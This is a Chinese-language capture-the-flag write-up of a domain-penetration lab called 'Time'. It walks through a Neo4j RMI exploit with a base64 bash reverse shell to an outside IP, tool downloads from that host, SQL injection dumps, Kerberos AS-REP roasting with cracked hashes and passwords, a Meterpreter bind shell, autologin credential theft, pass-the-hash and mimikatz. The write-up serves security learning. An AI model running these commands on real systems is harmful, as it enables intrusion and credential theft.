春秋云镜Time

flag01

端口扫描

image-20240818182736070

7687和7474是neo4j,直接找cve

https://github.com/zwjjustdoit/CVE-2021-34371.jar?tab=readme-ov-file

1
java -jar rhino_gadget.jar rmi://39.99.224.197:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuODAuMTUyLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"

image-20240818183407581

image-20240818183454944

flag02

将fscan,frp下载到靶机

服务器python起http服务就行

1
2
3
python3 -m http.server 8080

wget http://101.34.80.152:8080/frpc.ini

查看ip

image-20240818184239123

image-20240818184505637

1
2
3
4
172.22.6.12     域控
172.22.6.25 域内机器
172.22.6.36 当前机器
172.22.6.38 某后台登录界面

挂代理访问开始

访问http://172.22.6.38/

image-20240818185331683

尝试了一番弱密码,无用,sqlmap跑了跑发现可以

sql注入得到第二个flag

1
python3 sqlmap.py -r 1.txt -D oa_db -T oa_f1Agggg -dump -batch

image-20240818185731377

把users表中的用户名收集成字典username.txt,将下面命令生成的csv粘贴到usersname.txt里

1
python3 sqlmap.py -r 1.txt --dump -D oa_db -T oa_users -C email

在kerberos的AS-REQ认证中当cname值中的用户不存在时返回包提示KDC_ERR_C_PRINCIPAL_UNKNOWN,所以当我们没有域凭证时,可以通过Kerberos pre-auth从域外对域用户进行用户枚举

对于域用户,如果设置了选项Do not require Kerberos preauthentication(不要求Kerberos预身份认证),此时向域控制器的88端口发送AS-REQ请求,对收到的AS-REP内容重新组合,能够拼接成”Kerberos 5 AS-REP etype 23”(18200)的格式,接下来可以使用hashcat或是john对其破解,最终获得该用户的明文口令

将kerbrute_linux_386 userenum,username.txt上传到最开始的主机上

1
proxychains ./kerbrute_linux userenum --dc 172.22.6.12 -d xiaorang.lab 2.txt -t 10 

image-20240818191052925

1
hashcat -m 18200 --force -a 0 "$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:b6c410706b5e96c693b2fc61ee1064c3$2dc9fbee784e7997333f30c6bc4298ab5752ba94be7022e807af418c11359fd92597e253752f4e61d2d18a83f19b5c9df4761e485853a3d879bcf7a270d6f846683b811a80dda3809528190d7f058a24996aff13094ff9b32c0e2698f6d639b4d237a06d13c309ce7ab428656b79e582609240b01fb5cd47c91573f80f846dc483a113a86977486cecce78c03860050a81ee19921d3500f36ff39fa77edd9d5614cf4b9087d3e42caef68313d1bb0c4f6bc5392943557b584521b305f61e418eb0f6eb3bf339404892da55134cb4bf828ac318fe00d68d1778b7c82caf03b65f1938e54ed3fa51b63cdb2994" rockyou.txt

image-20240818192007767

1
hashcat -m 18200 --force -a 0 "$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:971802b84ce99050ad3c5f49d11fd0b7$6c1be075c3cf2a7695529de2ebbf39c5ec7e5326c9d891dac2107b239892f76befe52c860e4e1e2ff6537a5765a6bcb6b8baca792d60765ac0bbe1b3c5e59f3ec51b7426636a437d5df12130eb68d9b17ef431455415671c7331a17ce823e28cc411677bed341d3fceefc3451b8b232ea6039661625a5c793e30c4d149b2ed9d2926e9d825b3828744ebce69e47746994c9a749ceeb76c560a1840bc74d2b9f301bb5b870c680591516354460dab2238e7827900ed80320dd3a6f46874b1bc8a3a68aea7bd11d0683ec94103f59d9511691090928e98d0d8978f511e71fd9db0067fa0d450c120f3726918d7" rockyou.txt

image-20240818192113228

1
zhangxin@XIAORANG.LAB/strawberry

登录172.22.6.25

利用SharpHound进行信息搜集

1
SharpHound.exe -c all

image-20240818192707043

导出来的压缩包放到kali上

flag03&4

kali起动

1
2
3
neo4j start 
//开启neo4j
bloodhound

我不理解我上传压缩包的时候为甚一直是0%

好像是下载的bloodhound和SharpHound版本对不上。。。,我的SharpHound版本过于高了,建议换低一点的版本

启动之后,直接把压缩包拖入就可以了

借用一下图

image-20240818205029373

可以利用这个工具得知我们要攻击的具体路径和大题思路

可以看到,在172.22.6.25这个用户机,运行登录的用户有三个

而yuxuan 用户滥用了SID历史功能(SIDHistory是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的SID作为该对象的objectSid,在之前域中的SID会添加到该对象的sIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限)

HasSession:用户与计算机时进行会话时,凭据会保留在内存中,说明yuxuan这个用户登录过WIN2019

很多用户习惯将计算机设置自动登录,可以使用MSF抓取自动登录的用户名和密码

先生成一个正向shell,上传到WIN2019后运行

1
2
3
4
5
6
7
msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o bind_shell.exe
之后上传到win靶机运行
proxychains msf
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.22.6.25
run

image-20240818195551933

1
meterpreter > run windows/gather/credentials/windows_autologin

image-20240818195625616

得到密码

1
yuxuan/Yuxuan7QbrgZ3L

重新进行远程登录不过用户名密码不一样

我很疑惑我这里为什么显示登录失败,好吧,连接不稳定的原因

HasSIDHistory:用户的SID历史记录,用户在域迁移后,票据还包含着前域所在组的SID,虽然用户不属于前域,但仍拥有前域的权限

使用yuxuan这个用户抓Administrator的哈希

登录之后就可以用猕猴桃了,

去找域控用户的hash(虽然我连不上,我记录一下吧

image-20240818205430808

1
proxychains crackmapexec smb 172.22.6.25 -u administrator -H04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

利用smb读flag4,这俩都行

1
proxychains python3 smbexec.py XIAORANG/administrator@172.22.6.25  -hashes :04d93ffd6f5f6e4490e0de23f240a5e9

总结

这次靶机挺难评的,有学到了新工具的利用,neo4j+bloodhound,还有相对应的信息收集工具SharpHound

可是我到最后也没导入成功,不是为啥啊。。。还有172.22.6.25的远程桌面连接上yuxuan,一直显示我登陆凭证过期,emmm,密码也没有错,前面那个也能登录,可是yuxuan就是登不上,挺难崩的

第三个靶场了,感觉域渗透的过程也有点熟悉了

印象蛮深的就是这个猕猴桃

1
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"